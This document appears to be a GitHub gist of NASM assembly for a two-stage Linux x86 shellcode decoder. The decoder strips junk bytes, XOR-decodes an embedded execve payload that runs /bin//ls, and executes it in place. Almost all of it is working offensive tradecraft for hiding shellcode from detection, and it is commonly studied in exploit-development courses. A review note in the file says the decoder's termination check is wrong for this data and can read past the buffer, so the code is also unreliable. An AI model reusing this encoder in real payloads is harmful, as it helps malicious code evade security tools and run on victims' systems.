@ahpaleus
Created May 10, 2018 07:17
;-----------------------------------------------------------------------
; Two-stage decoder for a 25-byte Linux x86 (32-bit) payload.
; Syntax: NASM, Intel operand order. Decodes in place: both stages write
; back into EncodedShellcode, so the page holding this .text section must
; be writable (a link-time setting, not visible in this file).
;
; Layout of EncodedShellcode (51 bytes): even offsets hold the payload
; XORed with 0xaa, odd offsets hold junk bytes that are discarded, and a
; trailing 0xaa marks the end.
;   Stage 1 (decode): compacts the even-offset bytes to the front of the
;                     buffer, dropping the junk bytes.
;   Stage 2 (l1):     XORs each compacted byte with 0xaa, then jumps to
;                     the decoded bytes.
;
; Registers: esi = &EncodedShellcode (from the jmp/call/pop trick)
;            edi = stage-1 write cursor
;            eax = read offset into the buffer (only al is modified)
;            bl  = byte currently being examined
; All jumps are 'short' so every displacement fits in one byte.
;-----------------------------------------------------------------------
global _start
section .text
_start:
jmp short call_shellcode ; jmp/call/pop: the call below pushes the address of EncodedShellcode, pop retrieves it
decoder:
pop esi ; esi = return address pushed by 'call decoder' = &EncodedShellcode
lea edi, [esi +1] ; edi = stage-1 write cursor, starts at offset 1 (offset 0 is already a payload byte)
xor eax, eax ; eax = 0
mov al, 1 ; eax = 1: read offset of the first junk byte (junk sits at odd offsets)
xor ebx, ebx ; ebx = 0; only bl is used below
decode:
; Stage 1. Each pass reads the junk byte at odd offset eax, then copies the
; payload byte at eax+1 to [edi]. The write cursor (pass k writes offset k)
; always trails the read offset (2k-1), so nothing is overwritten before it
; has been read.
mov bl, byte [esi + eax] ; bl = junk byte at odd offset eax (0x39 on the first pass)
xor bl, 0xaa ; ZF set iff that junk byte is the 0xaa terminator (0x39 ^ 0xaa = 0x93 on the first pass)
jz short deXORING ; terminator found: the compacted, still-XORed payload starts at esi
mov bl, byte [esi + eax + 1] ; bl = encoded payload byte at even offset eax+1 (0x6a on the first pass)
mov byte [edi], bl ; store it at the write cursor, compacting the payload in place
inc edi ; advance write cursor
add al, 2 ; advance read offset to the next odd position
jmp short decode ; next pair
; NOTE(review): stage 1 tests only odd offsets (1, 3, 5, ...) for 0xaa, but the
; only 0xaa in the data below is at offset 50, which is even. On this data the
; 25th pass copies that 0xaa to offset 25 (where stage 2 will stop on it) and
; the loop then keeps reading past the end of EncodedShellcode until it happens
; to meet 0xaa at an odd offset or faults. Whether it terminates depends on the
; bytes that follow the buffer in memory, which this file does not control.
deXORING:
; Stage 2: offsets 0.. at esi now hold the XORed payload contiguously,
; terminated by a 0xaa byte.
xor ebx, ebx ; ebx = 0
xor eax, eax ; eax = 0: offset into the compacted payload
mov al, 0 ; redundant: al is already 0 from the xor above
l1: ; stage-2 loop: decode one byte per pass
mov bl, byte [esi + eax] ; bl = compacted byte at offset eax
xor bl, 0xaa ; decode it; ZF set iff the byte was the 0xaa terminator
jz short EncodedShellcode ; terminator reached: execute the decoded bytes at esi (the terminator itself is left unwritten)
mov byte [esi+eax], bl ; write the decoded byte back in place
inc eax ; next byte
jmp short l1
call_shellcode:
call decoder ; pushes the address of the bytes that follow (EncodedShellcode) as the return address
EncodedShellcode: db 0x9b,0x39,0x6a,0x7e,0xfa,0xc8,0xc2,0xc5,0x85,0x89,0x85,0x1c,0xc6,0xb2,0xd9,0xbc,0xc2,0x7d,0x85,0x60,0xc8,0xbc,0xc3,0x21,0xc4,0xfd,0x23,0x48,0x49,0xb3,0xfa,0x07,0x23,0xe2,0x48,0x7d,0xf9,0xd5,0x23,0x01,0x4b,0x94,0x1a,0x37,0xa1,0xbc,0x67,0xa8,0x2a,0x66,0xaa
; Stage-1 output: the even-offset bytes above, still XORed with 0xaa (25 bytes):
; 0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xc6,0xd9,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a,
; Original payload after stage 2 (each byte above ^ 0xaa, e.g. 0x9b ^ 0xaa = 0x31).
; The trailing \xb0\x0b\xcd\x80 is 'mov al, 11 / int 0x80', i.e. Linux i386
; syscall 11 (execve); useful when classifying this sample.
; \x31\xc0\x50\x68\x2f\x2f\x6c\x73\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80